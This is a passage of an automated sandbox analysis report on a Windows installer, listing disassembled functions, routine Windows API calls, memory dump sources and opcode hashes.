                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memmove_s
                                                                                              • String ID:
                                                                                              • API String ID: 800865076-0
                                                                                              • Opcode ID: 052af3e1cd63b7b32d93e05f0403934d3c10a9d179138d7e1437bd8bf0c64c07
                                                                                              • Instruction ID: 73ccc102bddd63dc1e88f7682f3012f4b7f116e7791479c4a7e3ce0448f52cf2
                                                                                              • Opcode Fuzzy Hash: 052af3e1cd63b7b32d93e05f0403934d3c10a9d179138d7e1437bd8bf0c64c07
                                                                                              • Instruction Fuzzy Hash: DB01B5B1618108AF970CDF59CC9ACAEB36EDFB4258716012EE50587B00DF71ED04D698
                                                                                              Function 6C8C5D3F Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8C5D46
                                                                                              • GetModuleFileNameW.KERNEL32(6C8A0000,00000010,00000104,?,6C8F831D,00000000), ref: 6C8C5D93
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileH_prolog3ModuleName
                                                                                              • String ID:
                                                                                              • API String ID: 3149745539-0
                                                                                              • Opcode ID: ba8b45d54c620ef05fe982824c789933216c1475a155b1f547026d67b6e775a6
                                                                                              • Instruction ID: bd93c08b4a318e5726004abaf26e57e01c21347dd9663138922c057d28394426
                                                                                              • Opcode Fuzzy Hash: ba8b45d54c620ef05fe982824c789933216c1475a155b1f547026d67b6e775a6
                                                                                              • Instruction Fuzzy Hash: E6019270A202199FCB14DFA5C9449EEBB71FF61359F014928E455ABB90C730DE0ACB94
                                                                                              Function 6C91847A Relevance: 3.0, APIs: 2, Instructions: 38registryCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegOpenKeyExW.KERNEL32(00000000,00000034,00000000,00000001,00000000,00000000,00000034,?,?,6C8D463B,00000034,00000034,00000000), ref: 6C9184A9
                                                                                              • RegCloseKey.ADVAPI32(?,?,?,6C8D463B,00000034,00000034,00000000), ref: 6C9184BA
                                                                                                • Part of subcall function 6C918414: GetModuleHandleW.KERNEL32(Advapi32.dll,?,?,6C91849F,00000000,00000034,00000001,00000000,00000000,00000034,?,?,6C8D463B,00000034,00000034,00000000), ref: 6C918425
                                                                                                • Part of subcall function 6C918414: GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 6C918435
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressCloseHandleModuleOpenProc
                                                                                              • String ID:
                                                                                              • API String ID: 823179699-0
                                                                                              • Opcode ID: c73f69094528a94b0217d89b1194273d736c72cd5f0c5962c130000586fede1c
                                                                                              • Instruction ID: d1b43b05ce0f0f02a35908890531110590ec217061d8c74691f82e988ea4dd63
                                                                                              • Opcode Fuzzy Hash: c73f69094528a94b0217d89b1194273d736c72cd5f0c5962c130000586fede1c
                                                                                              • Instruction Fuzzy Hash: B9F0C232105209FFDB198F82CC81B9EB77CFF00359F118126F9169A980CB35DA10EB94
                                                                                              Function 639629EF Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 639629F6
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                                • Part of subcall function 6394D923: __EH_prolog3.LIBCMT ref: 6394D92A
                                                                                                • Part of subcall function 6394D923: PathIsRelativeW.SHLWAPI(00000000,00000000,?,00000000,00000008,6395E271,00000000,?,?,00000DF0,?,?), ref: 6394D960
                                                                                                • Part of subcall function 6394D923: GetModuleFileNameW.KERNEL32(00000010,00000104,?,00000000,00000008,6395E271,00000000,?,?,00000DF0,?,?), ref: 6394D9BA
                                                                                                • Part of subcall function 6394D923: PathCombineW.SHLWAPI(?,?,?,00000000,?,00000000,00000008,6395E271,00000000,?,?,00000DF0,?,?), ref: 6394DA0D
                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 63962A33
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$Path$CombineFileFreeModuleNameRelativeString
                                                                                              • String ID:
                                                                                              • API String ID: 2530041087-0
                                                                                              • Opcode ID: 889e58d9cc3b1400c90b32b865566965b1f67acc63d09303c7cbdb7a39675615
                                                                                              • Instruction ID: 5861ebabda14537d3013b999edf7759edef9579330ff69845a28a84243a94aec
                                                                                              • Opcode Fuzzy Hash: 889e58d9cc3b1400c90b32b865566965b1f67acc63d09303c7cbdb7a39675615
                                                                                              • Instruction Fuzzy Hash: 43F01C71910309ABDF10EFA4CC04AEE7BB8FF15B19F008819F514A6150CB31DA149F51
                                                                                              Function 6C8E516F Relevance: 3.0, APIs: 2, Instructions: 19libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FreeLibrary.KERNEL32(00000000,?,6C8E50F8,00000000,0000000C,6C8E6E7F,00000000,?), ref: 6C8E517C
                                                                                              • LoadLibraryW.KERNEL32(?,?,?,6C8E50F8,00000000,0000000C,6C8E6E7F,00000000,?), ref: 6C8E5194
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Library$FreeLoad
                                                                                              • String ID:
                                                                                              • API String ID: 534179979-0
                                                                                              • Opcode ID: 1bc9aca2b4428e5e2fccc95480f3171218f278f6d1aa19f3a16c2321bd55a0ba
                                                                                              • Instruction ID: 848d2a6a500f8a2ed9f5d3467b23afb4fe3f4b807b9fb47a089bfd5f23967003
                                                                                              • Opcode Fuzzy Hash: 1bc9aca2b4428e5e2fccc95480f3171218f278f6d1aa19f3a16c2321bd55a0ba
                                                                                              • Instruction Fuzzy Hash: 69E08C3A2007009FD7308F99E508A4BBBF8EB86B45B008839E96AC3900CB31F412CA90
                                                                                              Function 6C8F4029 Relevance: 3.0, APIs: 2, Instructions: 17COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FlushFileBuffers.KERNEL32(?,?,6C902CF3), ref: 6C8F4035
                                                                                              • CloseHandle.KERNEL32(?), ref: 6C8F404C
                                                                                                • Part of subcall function 6C9189C8: GetLastError.KERNEL32(6C8C80E8,6C8CA9FA,?,80000000,00000001,00000003,00000080,00000000,00000000,?,?,?,?,?,00000001), ref: 6C9189C8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: BuffersCloseErrorFileFlushHandleLast
                                                                                              • String ID:
                                                                                              • API String ID: 2301079650-0
                                                                                              • Opcode ID: e639b834cbe445f6e2229314151ac40851eccb9d2b997bc29b2082d3e86b1da1
                                                                                              • Instruction ID: 83f0f3acee7a7ee4addfa153b3df8b41b74edbbd06af35c021929f75fc9a5c75
                                                                                              • Opcode Fuzzy Hash: e639b834cbe445f6e2229314151ac40851eccb9d2b997bc29b2082d3e86b1da1
                                                                                              • Instruction Fuzzy Hash: 13D012316147018BDB709F71E50E75676F4BFC135AF010E1DE471D6940D7B4E415C654
                                                                                              Function 6394E389 Relevance: 3.0, APIs: 2, Instructions: 12windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetParent.USER32 ref: 6394E390
                                                                                              • PostMessageW.USER32(00000000,00000470,00000000,?), ref: 6394E3A1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageParentPost
                                                                                              • String ID:
                                                                                              • API String ID: 3400216365-0
                                                                                              • Opcode ID: 40c1bcfc53c491e732998ab236e7b36b3acc101f310a5a9dc6eb928a600c1ffd
                                                                                              • Instruction ID: cc0e689045eb1ea56a2b5fee0e885a04409966cf970cc861e25f72a442884c35
                                                                                              • Opcode Fuzzy Hash: 40c1bcfc53c491e732998ab236e7b36b3acc101f310a5a9dc6eb928a600c1ffd
                                                                                              • Instruction Fuzzy Hash: D1C01276048208BFCB003BA1CC09F5A7FADEB86B99F048010F3084A4A29B72A4209A58
                                                                                              Function 00292915 Relevance: 3.0, APIs: 2, Instructions: 8memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000), ref: 0029291C
                                                                                              • Run.SETUPENGINE ref: 00292922
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2623419946.0000000000291000.00000020.00000001.01000000.00000008.sdmp, Offset: 00290000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2623171849.0000000000290000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2623684550.0000000000298000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2623967177.000000000029A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_290000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: HeapInformation
                                                                                              • String ID:
                                                                                              • API String ID: 3918721486-0
                                                                                              • Opcode ID: 89c90749a735588f7826add4365c426be2f7f845b05d390bd686dbf7605ae22a
                                                                                              • Instruction ID: 067db78deae28369b1371dfb4afe508df3e447bdfdcdcc586ff4e08710fe5479
                                                                                              • Opcode Fuzzy Hash: 89c90749a735588f7826add4365c426be2f7f845b05d390bd686dbf7605ae22a
                                                                                              • Instruction Fuzzy Hash: 85B092B05202416EEA005722AC0DF36261CEB00342F000812BC06C00A4C6A248A0C520
                                                                                              Function 6C8F84FF Relevance: 2.5, APIs: 2, Instructions: 43COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(00000003,00000000,00000000,000000FF,00000000,00000000,6C8FFA6E,02F92298,?,?,6C8F83B3,02F92298,6C8BA794,02F92298,6C8BA794,00000000), ref: 6C8F851E
                                                                                              • MultiByteToWideChar.KERNEL32(00000003,00000000,00000000,000000FF,00000000,00000000,00000000,6C8FFA6E,02F92298,?,?,6C8F83B3,02F92298,6C8BA794,02F92298,6C8BA794), ref: 6C8F853F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide
                                                                                              • String ID:
                                                                                              • API String ID: 626452242-0
                                                                                              • Opcode ID: 6ff92a0d6102aca654d1fc25e5d49c18a4e7c19af5b98ceb2295033fd968f1a8
                                                                                              • Instruction ID: 0d820384f12126e6e1c0ab8a240e831acd8c1242da38a60cb108af7a77a04ffe
                                                                                              • Opcode Fuzzy Hash: 6ff92a0d6102aca654d1fc25e5d49c18a4e7c19af5b98ceb2295033fd968f1a8
                                                                                              • Instruction Fuzzy Hash: D3F0C232244128B7CB225A8A8C44EDF7B1DEBABBB4F114506B6385A9808A30D50296B0
                                                                                              Function 6C8E878D Relevance: 1.9, APIs: 1, Instructions: 412COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8E8797
                                                                                                • Part of subcall function 6C8C5D3F: __EH_prolog3.LIBCMT ref: 6C8C5D46
                                                                                                • Part of subcall function 6C8C5D3F: GetModuleFileNameW.KERNEL32(6C8A0000,00000010,00000104,?,6C8F831D,00000000), ref: 6C8C5D93
                                                                                                • Part of subcall function 6C8E24CD: __EH_prolog3.LIBCMT ref: 6C8E24D4
                                                                                                • Part of subcall function 6C8E24CD: __CxxThrowException@8.LIBCMT ref: 6C8E255B
                                                                                                • Part of subcall function 6C8D953C: __EH_prolog3.LIBCMT ref: 6C8D9543
                                                                                                • Part of subcall function 6C8D953C: PathFileExistsW.SHLWAPI(00000000,?,?,?), ref: 6C8D95E6
                                                                                                • Part of subcall function 6C9268B5: PMDtoOffset.LIBCMT ref: 6C926989
                                                                                                • Part of subcall function 6C9268B5: std::bad_exception::bad_exception.LIBCMT ref: 6C9269B3
                                                                                                • Part of subcall function 6C9268B5: __CxxThrowException@8.LIBCMT ref: 6C9269C1
                                                                                                • Part of subcall function 6C8E8CBF: __EH_prolog3.LIBCMT ref: 6C8E8CC6
                                                                                                • Part of subcall function 6C8F8E8B: PathCombineW.SHLWAPI(?,6C8F831D,?,76F93340,?,6C8C7971,00000000,DW\DW20.exe,?,?,6C8F831D,00000000), ref: 6C8F8EB8
                                                                                                • Part of subcall function 6C8FB369: __EH_prolog3.LIBCMT ref: 6C8FB370
                                                                                                • Part of subcall function 6C8FB369: __recalloc.LIBCMT ref: 6C8FB3BB
                                                                                                • Part of subcall function 6C8FBC6D: __recalloc.LIBCMT ref: 6C8FBCAB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$Exception@8FilePathThrow__recalloc$CombineExistsModuleNameOffsetstd::bad_exception::bad_exception
                                                                                              • String ID:
                                                                                              • API String ID: 1089964648-0
                                                                                              • Opcode ID: ea500dda2e7f6de0fe1a5d222fe45e5ad6e4dfdad4c2f6f471f24ea51e3901f2
                                                                                              • Instruction ID: 09c6ff7c84ed2b58645a1799fd5468447b3f0f976d671a09df557f362b3a4ab7
                                                                                              • Opcode Fuzzy Hash: ea500dda2e7f6de0fe1a5d222fe45e5ad6e4dfdad4c2f6f471f24ea51e3901f2
                                                                                              • Instruction Fuzzy Hash: 34F1B071C01259DFCF10DFA8CA84ADEBBB5BF1A308F154965E814BB741C730AA19CBA1
                                                                                              Function 6C8E41FE Relevance: 1.6, APIs: 1, Instructions: 143COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8E4205
                                                                                                • Part of subcall function 6C8D2771: __EH_prolog3.LIBCMT ref: 6C8D2778
                                                                                                • Part of subcall function 6C8E4F19: __EH_prolog3.LIBCMT ref: 6C8E4F20
                                                                                                • Part of subcall function 6C8E2081: __EH_prolog3.LIBCMT ref: 6C8E2088
                                                                                                • Part of subcall function 6C8CC17A: _calloc.LIBCMT ref: 6C8CC1A0
                                                                                                • Part of subcall function 6C9178C8: RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,6C90139B,?,00000010,6C8D5A14,?,?,?,0000004C,6C90B498,?,?,?), ref: 6C9178D3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$ExceptionRaise_calloc
                                                                                              • String ID:
                                                                                              • API String ID: 1540488672-0
                                                                                              • Opcode ID: e6d36a7cc16b32cc1ad7dc969cc5e80cbd8389b44c9306157440a2d4fc31d905
                                                                                              • Instruction ID: b8aa4b7b7032aa7091998f82a05bbd8edad30cbcd7cdbec392ccbeb71b5cfcef
                                                                                              • Opcode Fuzzy Hash: e6d36a7cc16b32cc1ad7dc969cc5e80cbd8389b44c9306157440a2d4fc31d905
                                                                                              • Instruction Fuzzy Hash: FE513C7190124ADFCB10CFA8C680BD9BBF4BF49304F1588A9DD49AF716C770AA49CB60
                                                                                              Function 6C8F7889 Relevance: 1.6, APIs: 1, Instructions: 134COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8F7890
                                                                                                • Part of subcall function 6C91C0AA: _malloc.LIBCMT ref: 6C91C0C4
                                                                                                • Part of subcall function 6C8FA226: GetTickCount.KERNEL32 ref: 6C8FA241
                                                                                                • Part of subcall function 6C8FA226: GetTickCount.KERNEL32 ref: 6C8FA27C
                                                                                                • Part of subcall function 6C8FA226: __time64.LIBCMT ref: 6C8FA282
                                                                                                • Part of subcall function 6C8FA226: InitializeCriticalSection.KERNEL32(00000040,?,6C8F7905,?), ref: 6C8FA292
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: CountTick$CriticalH_prolog3InitializeSection__time64_malloc
                                                                                              • String ID:
                                                                                              • API String ID: 349597444-0
                                                                                              • Opcode ID: 1269749b4e7095bca5f63ce378b283f073d6164fd1c7a1227444134520a1de8e
                                                                                              • Instruction ID: be36ce30261add375fb16e79840c6f877f71068ce441eb5578364c477c4e1eb9
                                                                                              • Opcode Fuzzy Hash: 1269749b4e7095bca5f63ce378b283f073d6164fd1c7a1227444134520a1de8e
                                                                                              • Instruction Fuzzy Hash: F6518B74610618DFDB18DF38C995AA937B1FF09324B2089A9F826DB7A1CB30E905CB50
                                                                                              Function 6C8D59B8 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8D59BF
                                                                                                • Part of subcall function 6C8D56A3: SysFreeString.OLEAUT32(?), ref: 6C8D578A
                                                                                                • Part of subcall function 6C8D56A3: SysFreeString.OLEAUT32(?), ref: 6C8D5799
                                                                                                • Part of subcall function 6C8D56A3: SysFreeString.OLEAUT32(?), ref: 6C8D57C7
                                                                                                • Part of subcall function 6C901315: __EH_prolog3.LIBCMT ref: 6C90131C
                                                                                                • Part of subcall function 6C901315: _free.LIBCMT ref: 6C90137B
                                                                                                • Part of subcall function 6C8FB17C: __recalloc.LIBCMT ref: 6C8FB18D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeString$H_prolog3$__recalloc_free
                                                                                              • String ID:
                                                                                              • API String ID: 2446356840-0
                                                                                              • Opcode ID: 81dc078742b44b860cbb99ac1aef243bad407f41d66ec717e600415fa79926fa
                                                                                              • Instruction ID: ec11db43b7fceaf6423cc871629b70b1d9866b63d8390d84ec42ed6bd5b3d540
                                                                                              • Opcode Fuzzy Hash: 81dc078742b44b860cbb99ac1aef243bad407f41d66ec717e600415fa79926fa
                                                                                              • Instruction Fuzzy Hash: 385128B190131A9FCB50CFA8C68169EBBF0FF18304F55896ED459ABB00D730AA49CF91
                                                                                              Function 63965DEE Relevance: 1.6, APIs: 1, Instructions: 80COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 63965E81
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: LongWindow
                                                                                              • String ID:
                                                                                              • API String ID: 1378638983-0
                                                                                              • Opcode ID: 768dd9c18f098967cd32ae7b50fa61dbe693b9b78e99788e7a0b22cf571e5b1a
                                                                                              • Instruction ID: 58b4b7a61d7df3a96e4f80091475ef8aab54548668322f23a67f5f92475cc376
                                                                                              • Opcode Fuzzy Hash: 768dd9c18f098967cd32ae7b50fa61dbe693b9b78e99788e7a0b22cf571e5b1a
                                                                                              • Instruction Fuzzy Hash: 2421A031501704AFDF22CF14C584A8EBBF9EF4AB90F18451AF89697262D331E990CF95
                                                                                              Function 63963EF9 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
